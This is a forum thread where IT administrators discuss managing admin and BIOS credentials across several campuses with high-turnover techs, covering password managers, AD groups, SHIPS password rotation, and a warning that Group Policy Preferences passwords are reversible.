How do you handle your IT Dept. credentials for end user’s office computers maintenance…?

Hi, I have been asked by my supervisor to come up with another solution to simplify our current setup when it comes to dealing with our IT Dept. credentials (backdoor domain accounts, local admin accounts, BIOS, etc.).

Currently, I am using separate domain admin accounts for each location. I have four campuses to be exact and since these four locations are manned by part-time techs, we normally have a high turnover rate, because they usually get experience here then go find a full-time job elsewhere. So, with that in mind, I decided it would be easier and more secure to separate each location with its own set of credentials (local admin, domain admin, BIOS, test accounts, etc.).

This way when, not if, but when a part-time tech leaves I only need to change credentials for that location and not across the board for all campuses, like it used to be.


In light of this, I have decided to help them keep track of each location credentials by giving out “Password Cards” to the tech for each location. Well, my supervisor keeps asking me to come up with a more simplified solution because he cannot keep up with the all these passwords. The funny thing is he agreed to my solution years ago, but now that he is nearing his last year until retirement he keeps saying there has to be a better way to deal with this scenario.


So, this brings me to ask the question how do you or would you handle such a scenario as mine?


Is there any third-party solutions to address such a need/scenario?


Any advice/suggestions are welcome.


Thanks in advance.



There are many password management solutions out there that you can setup to manage current passwords for accounts of all shapes and sizes, like utility, test and service accounts. Secret Server is a popular one that allows you to tie AD groups or users to be able to view only certain subsets of accounts.

With that said, you should be managing as much of this as you can with Active Directory groups. As an example for local administrators, add all of the admins to an AD group like "Local Server Admins" or "Local Machine Admins" and set that group as local administrators on all boxes in the domain (or site) via GPO.



There are many password management solutions out there that you can setup to manage current passwords for accounts of all shapes and sizes, like utility, test and service accounts. Secret Server is a popular one that allows you to tie AD groups or users to be able to view only certain subsets of accounts.

With that said, you should be managing as much of this as you can with Active Directory groups. As an example for local administrators, add all of the admins to an AD group like "Local Server Admins" or "Local Machine Admins" and set that group as local administrators on all boxes in the domain (or site) via GPO.



Thanks Brad. Yes, I am taking full advantage of AD, AD groups and GPO's. My question was if you had multiple (physical) locations would you approach it as I did by having a different set of admin (IT Techs or Level 1 Techs) passwords that are just for that location rather than having one set that encompasses all physical locations.


I believe I have the correct approach, but wanted feedback and to see what others are doing in similar scenarios, before I go back to my supervisor and tell him we are doing it the best way possible at this time.


Thanks again.



Do not use GPO's to push passwords however, the passwords are world readable an totally reversable! http://obscuresecurity.blogspot.com/2013/07/get-gpppassword.html
http://www.nathanv.com/2012/07/04/pshell-script-extract-all-gpo-set-passwords-from-domain/
So if you use GPO's to set a standard password across your machines, you should stop :)
Try some software like this:https://www.trustedsec.com/january-2015/introducing-ships-centralized-local-password-management-windows/
SHIPS is nice, we used a homegrown version of something similar for a long time, we didn't know the passwords until we asked for them. They were rotated on a regular basis by our script, but we're using SHIPS now and it's been very good. Make sure you set permissions on the setAdminPass.vbs so that only the SYSTEM can read/execute the script.
-rich



Thanks Rich. I never knew that about the passwords being stored, but it makes sense. From what I am getting the passwords are stored in XML files on the domain controller (DC), correct? If so, then I am not too worried as none of my onsite techs have access to the DC's at any site or HQ. WIth that in mind, I have used GPO preferences to update the local admin accounts on client desktops in my domain in the past, but haven't done it for a while mainly because it just takes so long to accomplish and the scheduling issues to perform this in labs and staff office computers these days is becoming next to impossible during the normal business hours.

I guess I was originally asking what policies and procedures you have in place to handle critical passwords for managing multiple sites, especially if you have onsite techs (aka Level 1 techs) there to assist at each site and knowing you have a higher turn over rate on some sites than others.

Not necessarily the technical side of managing your passwords, but the departmental procedures/policies.

Thanks.



They can be one in the same, using a program like SHIPS, the passwords can be known to anyone with access, it will rotate on the schedule you dictate and be useless the next day if that's your time frame, it could be hourly. There are passwords that SHIPS can't help you with, sometimes someone has to type them, they will be known to that person, Service accounts that have to be used in 3rd party tools for instance. These have to be handled in different ways, as you've indicated. A Password rotation policy should help, when someone with access to level-x (admin, 3rd party vendor etc...) exits, you have a procedure to change/reset the passwords. You have to have that procedure as new services come in as well as the established ones.
For us, when someone with a high level access leaves, we have to rotate a bunch of accounts, not because they necessarily had access to them, but because the "could of" gained access to them while employed. And when that happens more than once, close together, it's frustrating, but we still have to follow the procedure. SHIPS and previously the home grown scripts we had for password rotation certainly make a lot of that easier.
-rich

Share this

Related Posts

There was an error in this gadget